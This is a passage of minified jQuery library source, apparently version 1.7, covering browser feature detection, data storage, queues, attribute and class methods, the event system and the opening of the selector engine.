q.test}catch(s){b.deleteExpando=!1}!q.addEventListener&&q.attachEvent&&q.fireEvent&&(q.attachEvent("onclick",function(){b.noCloneEvent=!1}),q.cloneNode(!0).fireEvent("onclick")),i=c.createElement("input"),i.value="t",i.setAttribute("type","radio"),b.radioValue=i.value==="t",i.setAttribute("checked","checked"),q.appendChild(i),k=c.createDocumentFragment(),k.appendChild(q.lastChild),b.checkClone=k.cloneNode(!0).cloneNode(!0).lastChild.checked,b.appendChecked=i.checked,k.removeChild(i),k.appendChild(q),q.innerHTML="",a.getComputedStyle&&(j=c.createElement("div"),j.style.width="0",j.style.marginRight="0",q.style.width="2px",q.appendChild(j),b.reliableMarginRight=(parseInt((a.getComputedStyle(j,null)||{marginRight:0}).marginRight,10)||0)===0);if(q.attachEvent)for(o in{submit:1,change:1,focusin:1})n="on"+o,p=n in q,p||(q.setAttribute(n,"return;"),p=typeof q[n]=="function"),b[o+"Bubbles"]=p;k.removeChild(q),k=g=h=j=q=i=null,f(function(){var 
a,d,e,g,h,i,j,k,m,n,o,r=c.getElementsByTagName("body")[0];!r||(j=1,k="position:absolute;top:0;left:0;width:1px;height:1px;margin:0;",m="visibility:hidden;border:0;",n="style='"+k+"border:5px solid #000;padding:0;'",o="<div "+n+"><div></div></div>"+"<table "+n+" cellpadding='0' cellspacing='0'>"+"<tr><td></td></tr></table>",a=c.createElement("div"),a.style.cssText=m+"width:0;height:0;position:static;top:0;margin-top:"+j+"px",r.insertBefore(a,r.firstChild),q=c.createElement("div"),a.appendChild(q),q.innerHTML="<table><tr><td style='padding:0;border:0;display:none'></td><td>t</td></tr></table>",l=q.getElementsByTagName("td"),p=l[0].offsetHeight===0,l[0].style.display="",l[1].style.display="none",b.reliableHiddenOffsets=p&&l[0].offsetHeight===0,q.innerHTML="",q.style.width=q.style.paddingLeft="1px",f.boxModel=b.boxModel=q.offsetWidth===2,typeof q.style.zoom!="undefined"&&(q.style.display="inline",q.style.zoom=1,b.inlineBlockNeedsLayout=q.offsetWidth===2,q.style.display="",q.innerHTML="<div style='width:4px;'></div>",b.shrinkWrapBlocks=q.offsetWidth!==2),q.style.cssText=k+m,q.innerHTML=o,d=q.firstChild,e=d.firstChild,h=d.nextSibling.firstChild.firstChild,i={doesNotAddBorder:e.offsetTop!==5,doesAddBorderForTableAndCells:h.offsetTop===5},e.style.position="fixed",e.style.top="20px",i.fixedPosition=e.offsetTop===20||e.offsetTop===15,e.style.position=e.style.top="",d.style.overflow="hidden",d.style.position="relative",i.subtractsBorderForOverflowNotVisible=e.offsetTop===-5,i.doesNotIncludeMarginInBodyOffset=r.offsetTop!==j,r.removeChild(a),q=a=null,f.extend(b,i))});return b}();var j=/^(?:\{.*\}|\[.*\])$/,k=/([A-Z])/g;f.extend({cache:{},uuid:0,expando:"jQuery"+(f.fn.jquery+Math.random()).replace(/\D/g,""),noData:{embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:!0},hasData:function(a){a=a.nodeType?f.cache[a[f.expando]]:a[f.expando];return!!a&&!m(a)},data:function(a,c,d,e){if(!!f.acceptData(a)){var g,h,i,j=f.expando,k=typeof 
c=="string",l=a.nodeType,m=l?f.cache:a,n=l?a[j]:a[j]&&j,o=c==="events";if((!n||!m[n]||!o&&!e&&!m[n].data)&&k&&d===b)return;n||(l?a[j]=n=++f.uuid:n=j),m[n]||(m[n]={},l||(m[n].toJSON=f.noop));if(typeof c=="object"||typeof c=="function")e?m[n]=f.extend(m[n],c):m[n].data=f.extend(m[n].data,c);g=h=m[n],e||(h.data||(h.data={}),h=h.data),d!==b&&(h[f.camelCase(c)]=d);if(o&&!h[c])return g.events;k?(i=h[c],i==null&&(i=h[f.camelCase(c)])):i=h;return i}},removeData:function(a,b,c){if(!!f.acceptData(a)){var d,e,g,h=f.expando,i=a.nodeType,j=i?f.cache:a,k=i?a[h]:h;if(!j[k])return;if(b){d=c?j[k]:j[k].data;if(d){f.isArray(b)||(b in d?b=[b]:(b=f.camelCase(b),b in d?b=[b]:b=b.split(" ")));for(e=0,g=b.length;e<g;e++)delete d[b[e]];if(!(c?m:f.isEmptyObject)(d))return}}if(!c){delete j[k].data;if(!m(j[k]))return}f.support.deleteExpando||!j.setInterval?delete j[k]:j[k]=null,i&&(f.support.deleteExpando?delete a[h]:a.removeAttribute?a.removeAttribute(h):a[h]=null)}},_data:function(a,b,c){return f.data(a,b,c,!0)},acceptData:function(a){if(a.nodeName){var b=f.noData[a.nodeName.toLowerCase()];if(b)return b!==!0&&a.getAttribute("classid")===b}return!0}}),f.fn.extend({data:function(a,c){var d,e,g,h=null;if(typeof a=="undefined"){if(this.length){h=f.data(this[0]);if(this[0].nodeType===1&&!f._data(this[0],"parsedAttrs")){e=this[0].attributes;for(var i=0,j=e.length;i<j;i++)g=e[i].name,g.indexOf("data-")===0&&(g=f.camelCase(g.substring(5)),l(this[0],g,h[g]));f._data(this[0],"parsedAttrs",!0)}}return h}if(typeof a=="object")return this.each(function(){f.data(this,a)});d=a.split("."),d[1]=d[1]?"."+d[1]:"";if(c===b){h=this.triggerHandler("getData"+d[1]+"!",[d[0]]),h===b&&this.length&&(h=f.data(this[0],a),h=l(this[0],a,h));return h===b&&d[1]?this.data(d[0]):h}return this.each(function(){var b=f(this),e=[d[0],c];b.triggerHandler("setData"+d[1]+"!",e),f.data(this,a,c),b.triggerHandler("changeData"+d[1]+"!",e)})},removeData:function(a){return 
this.each(function(){f.removeData(this,a)})}}),f.extend({_mark:function(a,b){a&&(b=(b||"fx")+"mark",f._data(a,b,(f._data(a,b)||0)+1))},_unmark:function(a,b,c){a!==!0&&(c=b,b=a,a=!1);if(b){c=c||"fx";var d=c+"mark",e=a?0:(f._data(b,d)||1)-1;e?f._data(b,d,e):(f.removeData(b,d,!0),n(b,c,"mark"))}},queue:function(a,b,c){var d;if(a){b=(b||"fx")+"queue",d=f._data(a,b),c&&(!d||f.isArray(c)?d=f._data(a,b,f.makeArray(c)):d.push(c));return d||[]}},dequeue:function(a,b){b=b||"fx";var c=f.queue(a,b),d=c.shift(),e={};d==="inprogress"&&(d=c.shift()),d&&(b==="fx"&&c.unshift("inprogress"),f._data(a,b+".run",e),d.call(a,function(){f.dequeue(a,b)},e)),c.length||(f.removeData(a,b+"queue "+b+".run",!0),n(a,b,"queue"))}}),f.fn.extend({queue:function(a,c){typeof a!="string"&&(c=a,a="fx");if(c===b)return f.queue(this[0],a);return this.each(function(){var b=f.queue(this,a,c);a==="fx"&&b[0]!=="inprogress"&&f.dequeue(this,a)})},dequeue:function(a){return this.each(function(){f.dequeue(this,a)})},delay:function(a,b){a=f.fx?f.fx.speeds[a]||a:a,b=b||"fx";return this.queue(b,function(b,c){var d=setTimeout(b,a);c.stop=function(){clearTimeout(d)}})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,c){function m(){--h||d.resolveWith(e,[e])}typeof a!="string"&&(c=a,a=b),a=a||"fx";var d=f.Deferred(),e=this,g=e.length,h=1,i=a+"defer",j=a+"queue",k=a+"mark",l;while(g--)if(l=f.data(e[g],i,b,!0)||(f.data(e[g],j,b,!0)||f.data(e[g],k,b,!0))&&f.data(e[g],i,f.Callbacks("once memory"),!0))h++,l.add(m);m();return d.promise()}});var o=/[\n\t\r]/g,p=/\s+/,q=/\r/g,r=/^(?:button|input)$/i,s=/^(?:button|input|object|select|textarea)$/i,t=/^a(?:rea)?$/i,u=/^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,v=f.support.getSetAttribute,w,x,y;f.fn.extend({attr:function(a,b){return f.access(this,a,b,!0,f.attr)},removeAttr:function(a){return this.each(function(){f.removeAttr(this,a)})},prop:function(a,b){return 
f.access(this,a,b,!0,f.prop)},removeProp:function(a){a=f.propFix[a]||a;return this.each(function(){try{this[a]=b,delete this[a]}catch(c){}})},addClass:function(a){var b,c,d,e,g,h,i;if(f.isFunction(a))return this.each(function(b){f(this).addClass(a.call(this,b,this.className))});if(a&&typeof a=="string"){b=a.split(p);for(c=0,d=this.length;c<d;c++){e=this[c];if(e.nodeType===1)if(!e.className&&b.length===1)e.className=a;else{g=" "+e.className+" ";for(h=0,i=b.length;h<i;h++)~g.indexOf(" "+b[h]+" ")||(g+=b[h]+" ");e.className=f.trim(g)}}}return this},removeClass:function(a){var c,d,e,g,h,i,j;if(f.isFunction(a))return this.each(function(b){f(this).removeClass(a.call(this,b,this.className))});if(a&&typeof a=="string"||a===b){c=(a||"").split(p);for(d=0,e=this.length;d<e;d++){g=this[d];if(g.nodeType===1&&g.className)if(a){h=(" "+g.className+" ").replace(o," ");for(i=0,j=c.length;i<j;i++)h=h.replace(" "+c[i]+" "," ");g.className=f.trim(h)}else g.className=""}}return this},toggleClass:function(a,b){var c=typeof a,d=typeof b=="boolean";if(f.isFunction(a))return this.each(function(c){f(this).toggleClass(a.call(this,c,this.className,b),b)});return this.each(function(){if(c==="string"){var e,g=0,h=f(this),i=b,j=a.split(p);while(e=j[g++])i=d?i:!h.hasClass(e),h[i?"addClass":"removeClass"](e)}else if(c==="undefined"||c==="boolean")this.className&&f._data(this,"__className__",this.className),this.className=this.className||a===!1?"":f._data(this,"__className__")||""})},hasClass:function(a){var b=" "+a+" ",c=0,d=this.length;for(;c<d;c++)if(this[c].nodeType===1&&(" "+this[c].className+" ").replace(o," ").indexOf(b)>-1)return!0;return!1},val:function(a){var c,d,e,g=this[0];{if(!!arguments.length){e=f.isFunction(a);return this.each(function(d){var g=f(this),h;if(this.nodeType===1){e?h=a.call(this,d,g.val()):h=a,h==null?h="":typeof h=="number"?h+="":f.isArray(h)&&(h=f.map(h,function(a){return 
a==null?"":a+""})),c=f.valHooks[this.nodeName.toLowerCase()]||f.valHooks[this.type];if(!c||!("set"in c)||c.set(this,h,"value")===b)this.value=h}})}if(g){c=f.valHooks[g.nodeName.toLowerCase()]||f.valHooks[g.type];if(c&&"get"in c&&(d=c.get(g,"value"))!==b)return d;d=g.value;return typeof d=="string"?d.replace(q,""):d==null?"":d}}}}),f.extend({valHooks:{option:{get:function(a){var b=a.attributes.value;return!b||b.specified?a.value:a.text}},select:{get:function(a){var b,c,d,e,g=a.selectedIndex,h=[],i=a.options,j=a.type==="select-one";if(g<0)return null;c=j?g:0,d=j?g+1:i.length;for(;c<d;c++){e=i[c];if(e.selected&&(f.support.optDisabled?!e.disabled:e.getAttribute("disabled")===null)&&(!e.parentNode.disabled||!f.nodeName(e.parentNode,"optgroup"))){b=f(e).val();if(j)return b;h.push(b)}}if(j&&!h.length&&i.length)return f(i[g]).val();return h},set:function(a,b){var c=f.makeArray(b);f(a).find("option").each(function(){this.selected=f.inArray(f(this).val(),c)>=0}),c.length||(a.selectedIndex=-1);return c}}},attrFn:{val:!0,css:!0,html:!0,text:!0,data:!0,width:!0,height:!0,offset:!0},attr:function(a,c,d,e){var g,h,i,j=a.nodeType;if(!!a&&j!==3&&j!==8&&j!==2){if(e&&c in f.attrFn)return f(a)[c](d);if(typeof a.getAttribute=="undefined")return f.prop(a,c,d);i=j!==1||!f.isXMLDoc(a),i&&(c=c.toLowerCase(),h=f.attrHooks[c]||(u.test(c)?x:w));if(d!==b){if(d===null){f.removeAttr(a,c);return}if(h&&"set"in h&&i&&(g=h.set(a,d,c))!==b)return g;a.setAttribute(c,""+d);return d}if(h&&"get"in h&&i&&(g=h.get(a,c))!==null)return g;g=a.getAttribute(c);return g===null?b:g}},removeAttr:function(a,b){var c,d,e,g,h=0;if(b&&a.nodeType===1){d=b.toLowerCase().split(p),g=d.length;for(;h<g;h++)e=d[h],e&&(c=f.propFix[e]||e,f.attr(a,e,""),a.removeAttribute(v?e:c),u.test(e)&&c in a&&(a[c]=!1))}},attrHooks:{type:{set:function(a,b){if(r.test(a.nodeName)&&a.parentNode)f.error("type property can't be changed");else if(!f.support.radioValue&&b==="radio"&&f.nodeName(a,"input")){var 
c=a.value;a.setAttribute("type",b),c&&(a.value=c);return b}}},value:{get:function(a,b){if(w&&f.nodeName(a,"button"))return w.get(a,b);return b in a?a.value:null},set:function(a,b,c){if(w&&f.nodeName(a,"button"))return w.set(a,b,c);a.value=b}}},propFix:{tabindex:"tabIndex",readonly:"readOnly","for":"htmlFor","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPadding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",contenteditable:"contentEditable"},prop:function(a,c,d){var e,g,h,i=a.nodeType;if(!!a&&i!==3&&i!==8&&i!==2){h=i!==1||!f.isXMLDoc(a),h&&(c=f.propFix[c]||c,g=f.propHooks[c]);return d!==b?g&&"set"in g&&(e=g.set(a,d,c))!==b?e:a[c]=d:g&&"get"in g&&(e=g.get(a,c))!==null?e:a[c]}},propHooks:{tabIndex:{get:function(a){var c=a.getAttributeNode("tabindex");return c&&c.specified?parseInt(c.value,10):s.test(a.nodeName)||t.test(a.nodeName)&&a.href?0:b}}}}),f.attrHooks.tabindex=f.propHooks.tabIndex,x={get:function(a,c){var d,e=f.prop(a,c);return e===!0||typeof e!="boolean"&&(d=a.getAttributeNode(c))&&d.nodeValue!==!1?c.toLowerCase():b},set:function(a,b,c){var d;b===!1?f.removeAttr(a,c):(d=f.propFix[c]||c,d in a&&(a[d]=!0),a.setAttribute(c,c.toLowerCase()));return c}},v||(y={name:!0,id:!0},w=f.valHooks.button={get:function(a,c){var d;d=a.getAttributeNode(c);return d&&(y[c]?d.nodeValue!=="":d.specified)?d.nodeValue:b},set:function(a,b,d){var e=a.getAttributeNode(d);e||(e=c.createAttribute(d),a.setAttributeNode(e));return e.nodeValue=b+""}},f.attrHooks.tabindex.set=w.set,f.each(["width","height"],function(a,b){f.attrHooks[b]=f.extend(f.attrHooks[b],{set:function(a,c){if(c===""){a.setAttribute(b,"auto");return c}}})}),f.attrHooks.contenteditable={get:w.get,set:function(a,b,c){b===""&&(b="false"),w.set(a,b,c)}}),f.support.hrefNormalized||f.each(["href","src","width","height"],function(a,c){f.attrHooks[c]=f.extend(f.attrHooks[c],{get:function(a){var d=a.getAttribute(c,2);return 
d===null?b:d}})}),f.support.style||(f.attrHooks.style={get:function(a){return a.style.cssText.toLowerCase()||b},set:function(a,b){return a.style.cssText=""+b}}),f.support.optSelected||(f.propHooks.selected=f.extend(f.propHooks.selected,{get:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex);return null}})),f.support.enctype||(f.propFix.enctype="encoding"),f.support.checkOn||f.each(["radio","checkbox"],function(){f.valHooks[this]={get:function(a){return a.getAttribute("value")===null?"on":a.value}}}),f.each(["radio","checkbox"],function(){f.valHooks[this]=f.extend(f.valHooks[this],{set:function(a,b){if(f.isArray(b))return a.checked=f.inArray(f(a).val(),b)>=0}})});var z=/^(?:textarea|input|select)$/i,A=/^([^\.]*)?(?:\.(.+))?$/,B=/\bhover(\.\S+)?\b/,C=/^key/,D=/^(?:mouse|contextmenu)|click/,E=/^(?:focusinfocus|focusoutblur)$/,F=/^(\w*)(?:#([\w\-]+))?(?:\.([\w\-]+))?$/,G=function(a){var b=F.exec(a);b&&(b[1]=(b[1]||"").toLowerCase(),b[3]=b[3]&&new RegExp("(?:^|\\s)"+b[3]+"(?:\\s|$)"));return b},H=function(a,b){var c=a.attributes||{};return(!b[1]||a.nodeName.toLowerCase()===b[1])&&(!b[2]||(c.id||{}).value===b[2])&&(!b[3]||b[3].test((c["class"]||{}).value))},I=function(a){return f.event.special.hover?a:a.replace(B,"mouseenter$1 mouseleave$1")};
-f.event={add:function(a,c,d,e,g){var h,i,j,k,l,m,n,o,p,q,r,s;if(!(a.nodeType===3||a.nodeType===8||!c||!d||!(h=f._data(a)))){d.handler&&(p=d,d=p.handler),d.guid||(d.guid=f.guid++),j=h.events,j||(h.events=j={}),i=h.handle,i||(h.handle=i=function(a){return typeof f!="undefined"&&(!a||f.event.triggered!==a.type)?f.event.dispatch.apply(i.elem,arguments):b},i.elem=a),c=f.trim(I(c)).split(" ");for(k=0;k<c.length;k++){l=A.exec(c[k])||[],m=l[1],n=(l[2]||"").split(".").sort(),s=f.event.special[m]||{},m=(g?s.delegateType:s.bindType)||m,s=f.event.special[m]||{},o=f.extend({type:m,origType:l[1],data:e,handler:d,guid:d.guid,selector:g,quick:G(g),namespace:n.join(".")},p),r=j[m];if(!r){r=j[m]=[],r.delegateCount=0;if(!s.setup||s.setup.call(a,e,n,i)===!1)a.addEventListener?a.addEventListener(m,i,!1):a.attachEvent&&a.attachEvent("on"+m,i)}s.add&&(s.add.call(a,o),o.handler.guid||(o.handler.guid=d.guid)),g?r.splice(r.delegateCount++,0,o):r.push(o),f.event.global[m]=!0}a=null}},global:{},remove:function(a,b,c,d,e){var g=f.hasData(a)&&f._data(a),h,i,j,k,l,m,n,o,p,q,r,s;if(!!g&&!!(o=g.events)){b=f.trim(I(b||"")).split(" ");for(h=0;h<b.length;h++){i=A.exec(b[h])||[],j=k=i[1],l=i[2];if(!j){for(j in o)f.event.remove(a,j+b[h],c,d,!0);continue}p=f.event.special[j]||{},j=(d?p.delegateType:p.bindType)||j,r=o[j]||[],m=r.length,l=l?new RegExp("(^|\\.)"+l.split(".").sort().join("\\.(?:.*\\.)?")+"(\\.|$)"):null;for(n=0;n<r.length;n++)s=r[n],(e||k===s.origType)&&(!c||c.guid===s.guid)&&(!l||l.test(s.namespace))&&(!d||d===s.selector||d==="**"&&s.selector)&&(r.splice(n--,1),s.selector&&r.delegateCount--,p.remove&&p.remove.call(a,s));r.length===0&&m!==r.length&&((!p.teardown||p.teardown.call(a,l)===!1)&&f.removeEvent(a,j,g.handle),delete o[j])}f.isEmptyObject(o)&&(q=g.handle,q&&(q.elem=null),f.removeData(a,["events","handle"],!0))}},customEvent:{getData:!0,setData:!0,changeData:!0},trigger:function(c,d,e,g){if(!e||e.nodeType!==3&&e.nodeType!==8){var 
h=c.type||c,i=[],j,k,l,m,n,o,p,q,r,s;if(E.test(h+f.event.triggered))return;h.indexOf("!")>=0&&(h=h.slice(0,-1),k=!0),h.indexOf(".")>=0&&(i=h.split("."),h=i.shift(),i.sort());if((!e||f.event.customEvent[h])&&!f.event.global[h])return;c=typeof c=="object"?c[f.expando]?c:new f.Event(h,c):new f.Event(h),c.type=h,c.isTrigger=!0,c.exclusive=k,c.namespace=i.join("."),c.namespace_re=c.namespace?new RegExp("(^|\\.)"+i.join("\\.(?:.*\\.)?")+"(\\.|$)"):null,o=h.indexOf(":")<0?"on"+h:"";if(!e){j=f.cache;for(l in j)j[l].events&&j[l].events[h]&&f.event.trigger(c,d,j[l].handle.elem,!0);return}c.result=b,c.target||(c.target=e),d=d!=null?f.makeArray(d):[],d.unshift(c),p=f.event.special[h]||{};if(p.trigger&&p.trigger.apply(e,d)===!1)return;r=[[e,p.bindType||h]];if(!g&&!p.noBubble&&!f.isWindow(e)){s=p.delegateType||h,m=E.test(s+h)?e:e.parentNode,n=null;for(;m;m=m.parentNode)r.push([m,s]),n=m;n&&n===e.ownerDocument&&r.push([n.defaultView||n.parentWindow||a,s])}for(l=0;l<r.length&&!c.isPropagationStopped();l++)m=r[l][0],c.type=r[l][1],q=(f._data(m,"events")||{})[c.type]&&f._data(m,"handle"),q&&q.apply(m,d),q=o&&m[o],q&&f.acceptData(m)&&q.apply(m,d)===!1&&c.preventDefault();c.type=h,!g&&!c.isDefaultPrevented()&&(!p._default||p._default.apply(e.ownerDocument,d)===!1)&&(h!=="click"||!f.nodeName(e,"a"))&&f.acceptData(e)&&o&&e[h]&&(h!=="focus"&&h!=="blur"||c.target.offsetWidth!==0)&&!f.isWindow(e)&&(n=e[o],n&&(e[o]=null),f.event.triggered=h,e[h](),f.event.triggered=b,n&&(e[o]=n));return c.result}},dispatch:function(c){c=f.event.fix(c||a.event);var 
d=(f._data(this,"events")||{})[c.type]||[],e=d.delegateCount,g=[].slice.call(arguments,0),h=!c.exclusive&&!c.namespace,i=[],j,k,l,m,n,o,p,q,r,s,t;g[0]=c,c.delegateTarget=this;if(e&&!c.target.disabled&&(!c.button||c.type!=="click")){m=f(this),m.context=this.ownerDocument||this;for(l=c.target;l!=this;l=l.parentNode||this){o={},q=[],m[0]=l;for(j=0;j<e;j++)r=d[j],s=r.selector,o[s]===b&&(o[s]=r.quick?H(l,r.quick):m.is(s)),o[s]&&q.push(r);q.length&&i.push({elem:l,matches:q})}}d.length>e&&i.push({elem:this,matches:d.slice(e)});for(j=0;j<i.length&&!c.isPropagationStopped();j++){p=i[j],c.currentTarget=p.elem;for(k=0;k<p.matches.length&&!c.isImmediatePropagationStopped();k++){r=p.matches[k];if(h||!c.namespace&&!r.namespace||c.namespace_re&&c.namespace_re.test(r.namespace))c.data=r.data,c.handleObj=r,n=((f.event.special[r.origType]||{}).handle||r.handler).apply(p.elem,g),n!==b&&(c.result=n,n===!1&&(c.preventDefault(),c.stopPropagation()))}}return c.result},props:"attrChange attrName relatedNode srcElement altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(a,b){a.which==null&&(a.which=b.charCode!=null?b.charCode:b.keyCode);return a}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(a,d){var e,f,g,h=d.button,i=d.fromElement;a.pageX==null&&d.clientX!=null&&(e=a.target.ownerDocument||c,f=e.documentElement,g=e.body,a.pageX=d.clientX+(f&&f.scrollLeft||g&&g.scrollLeft||0)-(f&&f.clientLeft||g&&g.clientLeft||0),a.pageY=d.clientY+(f&&f.scrollTop||g&&g.scrollTop||0)-(f&&f.clientTop||g&&g.clientTop||0)),!a.relatedTarget&&i&&(a.relatedTarget=i===a.target?d.toElement:i),!a.which&&h!==b&&(a.which=h&1?1:h&2?3:h&4?2:0);return a}},fix:function(a){if(a[f.expando])return a;var 
d,e,g=a,h=f.event.fixHooks[a.type]||{},i=h.props?this.props.concat(h.props):this.props;a=f.Event(g);for(d=i.length;d;)e=i[--d],a[e]=g[e];a.target||(a.target=g.srcElement||c),a.target.nodeType===3&&(a.target=a.target.parentNode),a.metaKey===b&&(a.metaKey=a.ctrlKey);return h.filter?h.filter(a,g):a},special:{ready:{setup:f.bindReady},load:{noBubble:!0},focus:{delegateType:"focusin"},blur:{delegateType:"focusout"},beforeunload:{setup:function(a,b,c){f.isWindow(this)&&(this.onbeforeunload=c)},teardown:function(a,b){this.onbeforeunload===b&&(this.onbeforeunload=null)}}},simulate:function(a,b,c,d){var e=f.extend(new f.Event,c,{type:a,isSimulated:!0,originalEvent:{}});d?f.event.trigger(e,null,b):f.event.dispatch.call(b,e),e.isDefaultPrevented()&&c.preventDefault()}},f.event.handle=f.event.dispatch,f.removeEvent=c.removeEventListener?function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c,!1)}:function(a,b,c){a.detachEvent&&a.detachEvent("on"+b,c)},f.Event=function(a,b){if(!(this instanceof f.Event))return new f.Event(a,b);a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||a.returnValue===!1||a.getPreventDefault&&a.getPreventDefault()?K:J):this.type=a,b&&f.extend(this,b),this.timeStamp=a&&a.timeStamp||f.now(),this[f.expando]=!0},f.Event.prototype={preventDefault:function(){this.isDefaultPrevented=K;var a=this.originalEvent;!a||(a.preventDefault?a.preventDefault():a.returnValue=!1)},stopPropagation:function(){this.isPropagationStopped=K;var a=this.originalEvent;!a||(a.stopPropagation&&a.stopPropagation(),a.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=K,this.stopPropagation()},isDefaultPrevented:J,isPropagationStopped:J,isImmediatePropagationStopped:J},f.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(a,b){f.event.special[a]={delegateType:b,bindType:b,handle:function(a){var 
c=this,d=a.relatedTarget,e=a.handleObj,g=e.selector,h;if(!d||d!==c&&!f.contains(c,d))a.type=e.origType,h=e.handler.apply(this,arguments),a.type=b;return h}}}),f.support.submitBubbles||(f.event.special.submit={setup:function(){if(f.nodeName(this,"form"))return!1;f.event.add(this,"click._submit keypress._submit",function(a){var c=a.target,d=f.nodeName(c,"input")||f.nodeName(c,"button")?c.form:b;d&&!d._submit_attached&&(f.event.add(d,"submit._submit",function(a){this.parentNode&&!a.isTrigger&&f.event.simulate("submit",this.parentNode,a,!0)}),d._submit_attached=!0)})},teardown:function(){if(f.nodeName(this,"form"))return!1;f.event.remove(this,"._submit")}}),f.support.changeBubbles||(f.event.special.change={setup:function(){if(z.test(this.nodeName)){if(this.type==="checkbox"||this.type==="radio")f.event.add(this,"propertychange._change",function(a){a.originalEvent.propertyName==="checked"&&(this._just_changed=!0)}),f.event.add(this,"click._change",function(a){this._just_changed&&!a.isTrigger&&(this._just_changed=!1,f.event.simulate("change",this,a,!0))});return!1}f.event.add(this,"beforeactivate._change",function(a){var b=a.target;z.test(b.nodeName)&&!b._change_attached&&(f.event.add(b,"change._change",function(a){this.parentNode&&!a.isSimulated&&!a.isTrigger&&f.event.simulate("change",this.parentNode,a,!0)}),b._change_attached=!0)})},handle:function(a){var b=a.target;if(this!==b||a.isSimulated||a.isTrigger||b.type!=="radio"&&b.type!=="checkbox")return a.handleObj.handler.apply(this,arguments)},teardown:function(){f.event.remove(this,"._change");return z.test(this.nodeName)}}),f.support.focusinBubbles||f.each({focus:"focusin",blur:"focusout"},function(a,b){var d=0,e=function(a){f.event.simulate(b,a.target,f.event.fix(a),!0)};f.event.special[b]={setup:function(){d++===0&&c.addEventListener(a,e,!0)},teardown:function(){--d===0&&c.removeEventListener(a,e,!0)}}}),f.fn.extend({on:function(a,c,d,e,g){var h,i;if(typeof a=="object"){typeof c!="string"&&(d=c,c=b);for(i in 
a)this.on(i,c,d,a[i],g);return this}d==null&&e==null?(e=c,d=c=b):e==null&&(typeof c=="string"?(e=d,d=b):(e=d,d=c,c=b));if(e===!1)e=J;else if(!e)return this;g===1&&(h=e,e=function(a){f().off(a);return h.apply(this,arguments)},e.guid=h.guid||(h.guid=f.guid++));return this.each(function(){f.event.add(this,a,e,d,c)})},one:function(a,b,c,d){return this.on.call(this,a,b,c,d,1)},off:function(a,c,d){if(a&&a.preventDefault&&a.handleObj){var e=a.handleObj;f(a.delegateTarget).off(e.namespace?e.type+"."+e.namespace:e.type,e.selector,e.handler);return this}if(typeof a=="object"){for(var g in a)this.off(g,c,a[g]);return this}if(c===!1||typeof c=="function")d=c,c=b;d===!1&&(d=J);return this.each(function(){f.event.remove(this,a,d,c)})},bind:function(a,b,c){return this.on(a,null,b,c)},unbind:function(a,b){return this.off(a,null,b)},live:function(a,b,c){f(this.context).on(a,this.selector,b,c);return this},die:function(a,b){f(this.context).off(a,this.selector||"**",b);return this},delegate:function(a,b,c,d){return this.on(b,a,c,d)},undelegate:function(a,b,c){return arguments.length==1?this.off(a,"**"):this.off(b,a,c)},trigger:function(a,b){return this.each(function(){f.event.trigger(a,b,this)})},triggerHandler:function(a,b){if(this[0])return f.event.trigger(a,b,this[0],!0)},toggle:function(a){var b=arguments,c=a.guid||f.guid++,d=0,e=function(c){var e=(f._data(this,"lastToggle"+a.guid)||0)%d;f._data(this,"lastToggle"+a.guid,e+1),c.preventDefault();return b[e].apply(this,arguments)||!1};e.guid=c;while(d<b.length)b[d++].guid=c;return this.click(e)},hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}}),f.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(a,b){f.fn[b]=function(a,c){c==null&&(c=a,a=null);return 
arguments.length>0?this.on(b,null,a,c):this.trigger(b)},f.attrFn&&(f.attrFn[b]=!0),C.test(b)&&(f.event.fixHooks[b]=f.event.keyHooks),D.test(b)&&(f.event.fixHooks[b]=f.event.mouseHooks)}),function(){function x(a,b,c,e,f,g){for(var h=0,i=e.length;h<i;h++){var j=e[h];if(j){var k=!1;j=j[a];while(j){if(j[d]===c){k=e[j.sizset];break}if(j.nodeType===1){g||(j[d]=c,j.sizset=h);if(typeof b!="string"){if(j===b){k=!0;break}}else if(m.filter(b,[j]).length>0){k=j;break}}j=j[a]}e[h]=k}}}function w(a,b,c,e,f,g){for(var h=0,i=e.length;h<i;h++){var j=e[h];if(j){var k=!1;j=j[a];while(j){if(j[d]===c){k=e[j.sizset];break}j.nodeType===1&&!g&&(j[d]=c,j.sizset=h);if(j.nodeName.toLowerCase()===b){k=j;break}j=j[a]}e[h]=k}}}var a=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^\[\]]*\]|['"][^'"]*['"]|[^\[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,d="sizcache"+(Math.random()+"").replace(".",""),e=0,g=Object.prototype.toString,h=!1,i=!0,j=/\\/g,k=/\r\n/g,l=/\W/;[0,0].sort(function(){i=!1;return 0});var m=function(b,d,e,f){e=e||[],d=d||c;var h=d;if(d.nodeType!==1&&d.nodeType!==9)return[];if(!b||typeof b!="string")return e;var 